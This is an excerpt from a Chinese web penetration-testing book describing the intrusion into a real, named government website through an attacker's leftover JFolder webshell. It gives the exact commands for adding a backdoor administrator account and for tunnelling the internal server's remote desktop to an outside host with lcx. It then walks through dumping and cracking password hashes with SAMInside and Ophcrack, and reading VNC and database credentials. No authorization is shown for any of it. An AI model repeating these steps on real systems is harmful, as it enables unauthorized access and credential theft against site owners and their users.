- Web滲透技術及實戰案例解析
- 陳小兵 范淵 孫立偉編著
- 1707字
- 2018-12-26 19:37:16
2.5 利用JFolder后門滲透某網站
2.5.1 JFolder搜索與測試
1.搜索JFloder
JFolder是一款流行的JspWebshell后門,能進行文件管理等操作。在Google中進行定位搜索“filetype:jsp JFolder.jsp”,如圖2-34所示,搜索出多個搜索結果。在這些搜索結果可以看到在第9個和第10個的地址欄中包含有JFolder.jsp。
圖2-34 獲取存在JFolder.jsp的頁面
2.測試WebShell
單擊第9個記錄,如圖2-35所示進入JFolder的WebShell界面,在該界面中可以清楚地看到“www.hmilyld.cn By Hmilyld修改”字樣。在登錄密碼中輸入一些簡單密碼進行登錄測試,測試結果表明該Shell采用了自己的密碼。在獲取這類WebShell的處理時,有兩種方法:一種是逆向追蹤WebShell作者,從作者處獲取WebShell,再在WebShell中獲取登錄密碼進行測試;另外一種就是直接對存在WebShell的網站進行滲透測試。
圖2-35 WebShell登錄測試
2.5.2 Web滲透測試
1.目錄瀏覽測試
在WebShell地址中去掉WebShell的名稱進行瀏覽,如圖2-36所示,其訪問地址為:http://www.cshtz.gov.cn/webkey/apps/cms/upload/,回車后可以獲取該目錄下的所有圖片等文件。測試表明該網站對目錄權限設置不嚴格,允許匿名用戶自己瀏覽目錄。
圖2-36 目錄訪問測試
2.獲取WebShell
依次逐層減少目錄進行訪問,最終在webkey目錄獲取了一個不用訪問密碼的WebShell,如圖2-37所示。
圖2-37 獲取WebShell
2.5.3 服務器提權
1.上傳文件
在獲取第一個WebShell后,可以有選擇地上傳一些文件,例如上傳自己使用熟練的WebShell,如圖2-38所示,上傳一個Jbrowser的WebShell,另外,還可上傳一些常用的工具軟件,如samsinside等。
圖2-38 上傳文件
2.獲取網絡配置等信息
單擊“Launch external program”進入命令執行窗口,在其中輸入“ipconfig /all”查看該網絡的詳細配置情況,如圖2-39所示,該服務器IP地址為172.19.0.45,說明是內網服務器。再在命令窗口分別執行“net user 1 1 /add”和“net localgroup administrators 1 /add”命令,添加一個管理員用戶“1”,密碼為“1”。
圖2-39 獲取網絡配置信息
3.內網映射
將端口映射程序lcx.exe上傳到系統盤Windows目錄中,然后在命令執行窗口執行“C:\windows\lcx.exe -slave 202.102.***.** 51 172.19.0.45 3389”,將IP地址為172.19.0.45的內網服務器的3389端口,轉發到具有外網獨立IP地址為202.102.***.**的服務器的51端口,如圖2-40所示,命令執行成功后會顯示連接信息。由于未在202.102.***.**上進行監聽,所以出現連接錯誤。
圖2-40 內網映射
在外網服務器上執行“lcx -listen 51 2008”命令,如圖2-41所示,執行成功后會出現一連串的接受和發送數據,表明連接建立成功。
圖2-41 成功建立連接通道
4.登錄服務器
單擊“開始”-“運行”,在其中輸入“mstsc”,打開遠程終端連接端,在計算機中輸入連接地址“127.0.0.1:2008”,出現連接界面后輸入用戶名和密碼,成功登錄服務器,如圖2-42所示。
圖2-42 登錄服務器
5.獲取服務器密碼
將saminside.rar壓縮文件解壓到本地,然后雙擊saminside.exe文件運行saminside,如圖2-43所示,單擊三個小人的圖表,在出現的列表中選擇“Import Local using Scheduler”,接著程序就會自動獲取服務器中的用戶密碼等信息。
圖2-43 運行saninside獲取服務器密碼
一般20秒左右,saminside程序會將系統中存在的可以獲取密碼用戶的相關信息讀取出來,如圖2-44所示,可以看到有5個用戶信息,其中用戶“1”密碼比較簡單直接讀取出來,其余密碼設置較為復雜,其信息顯示在saminside的信息表中,分別選中user中的復選框,在菜單中單擊“File”-“Export users in PWDUMP file”,導出密碼文件到指定的文件中。
圖2-44 導出用戶密碼
6.快速破解服務器密碼
整理剛才“Export users in PWDUMP file”的文件,本案例中僅僅選擇“administrator”用戶的記錄,清理無用信息后打開Ophcrack,將其load進去,如圖2-45所示,單擊Crack進行破解,不到兩分鐘該密碼就被破解出來了。
圖2-45 破解服務器密碼
2.5.4 其他信息獲取
1.讀取VNC密碼
使用剛才破解的密碼重新登錄系統,登錄系統后,在該系統中安裝了VNC遠程管理軟件,直接上傳一個VNCPassView軟件,運行后即可讀取其密碼,如圖2-46所示。
圖2-46 獲取VNC密碼
2.獲取數據庫密碼
通過查看各個磁盤的內容,在E盤發現有網站的備份文件,如圖2-47所示,其中的“數據庫.txt”文件記錄了數據庫服務器(172.19.0.27)的用戶名和登錄密碼。
圖2-47 獲取數據庫密碼
2.5.5 總結與探討
(1)快速密碼獲取。在添加一個管理員用戶的情況、通過端口映射登錄系統后,通過上傳Saminside,可以在1分鐘內快速獲取服務器中原有用戶的密碼Hash。獲取系統Hash后通過Ophcrack又可以快速破解,從而獲取原有系統的用戶密碼。
(2)在獲取原有系統的用戶名和密碼后,使用其登錄系統,通過一些工具軟件可以快速獲取系統中一些有用信息。
(3)在外網僅僅開放80端口,如果Web程序部署和編寫存在漏洞,通過端口映射等手段完全可以滲透進入內網,在突破第一道防線后,再對內網進行滲透就容易多了。
(4)saminside和gethashes等工具在用戶密碼過長的情況下是無法獲取的,只能使用特殊的方法來獲取。